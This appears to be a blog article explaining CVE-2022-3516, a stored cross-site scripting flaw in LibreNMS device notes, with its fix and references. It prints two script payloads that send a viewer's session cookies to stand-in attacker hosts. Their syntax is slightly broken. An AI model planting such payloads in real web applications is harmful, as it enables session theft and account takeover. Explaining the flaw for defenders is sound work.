LibreNMS is a powerful, open source network monitoring tool used by many companies and IT enthusiasts. However, from time to time vulnerabilities are discovered — and some can be abused by attackers to compromise the security of the entire system. One such vulnerability is CVE-2022-3516, which allowed an adversary to perform a stored Cross-site Scripting (XSS) attack. Let’s break down what this means, how it works, see example exploit code, and find out how to protect your systems.
What is CVE-2022-3516?
CVE-2022-3516 is a security flaw found in LibreNMS before version 22.10.. It is classified as a stored XSS vulnerability, which means an attacker can place (store) some malicious JavaScript code into the system (for example, via a form), and then this code is executed in the browser of any user who views the compromised data. This can lead to theft of login cookies, account takeover, or even more serious consequences, depending on your setup.
XSS In a Nutshell
- Reflected XSS: Attacker injects code into a single request. Triggered instantly in the victim’s browser.
- Stored XSS (as in CVE-2022-3516): Attacker’s code is saved in the database and executed when any user views the infected content.
The Vulnerability: Where and How?
Stored XSS in this case existed because LibreNMS did not properly sanitize user input in certain fields, especially in device notes or custom fields. An attacker could inject JavaScript code, which would then be stored in the database and rendered by the browser for any user viewing that section.
Example Vulnerable Field
The Device Notes is a classic case — admins often use it to add notes about devices. But, if LibreNMS does not filter out dangerous HTML/JS, it can be abused!
1. Attacker Logs In
The attacker needs credentials with permission to add/edit device notes or other vulnerable fields (many XSS flaws also work with a low-privilege account).
Here’s an example of what the attacker might add into a device note
<script>
fetch('https://evil-attacker.site/steal?cookie='; + document.cookie);
</script>
Or a sneakier one-liner
<img src="x" onerror="alert('XSS test: CVE-2022-3516')">
The above code will run in the browser of any user (including admins) who later views this device note.
3. Waiting
Now, when another user (say, an admin) logs in and views the device notes, the attacker’s code executes. This can steal sessions, install keyloggers, or perform any action the user could.
Step 1: Add the following script in a device note
<script>
// This will send the user's cookies to the attacker
(new Image()).src = "https://evil-site.com/?c="; + encodeURIComponent(document.cookie);
</script>
Step 2: An admin visits the device note page. The code above runs in their browser, sending their session cookies to the attacker’s site.
How Was it Fixed?
Developers patched this issue in pull request #14361 and release 22.10.. The fix included:
Proper sanitization and escaping of user-supplied input in device notes and other fields.
- Use of safe HTML renderers like Purifier to strip out risky tags/scripts.
Original References
- Official GHSA-v7pv-q6wh-cg5c advisory
- CVE-2022-3516 on NVD
- LibreNMS Release Notes 22.10.
Conclusion
CVE-2022-3516 is a classic example of why even “internal” tools need robust security processes. Stored XSS flaws, like this one in LibreNMS before 22.10., give attackers a powerful foothold. If you haven’t updated yet — do so now! And remind your team: Never trust user input — always sanitize!
*Stay safe and keep your networks monitored — not compromised!*
*Article written exclusively for you, based on official and public sources.*
Timeline
Published on: 11/20/2022 05:15:00 UTC
Last modified on: 11/21/2022 12:42:00 UTC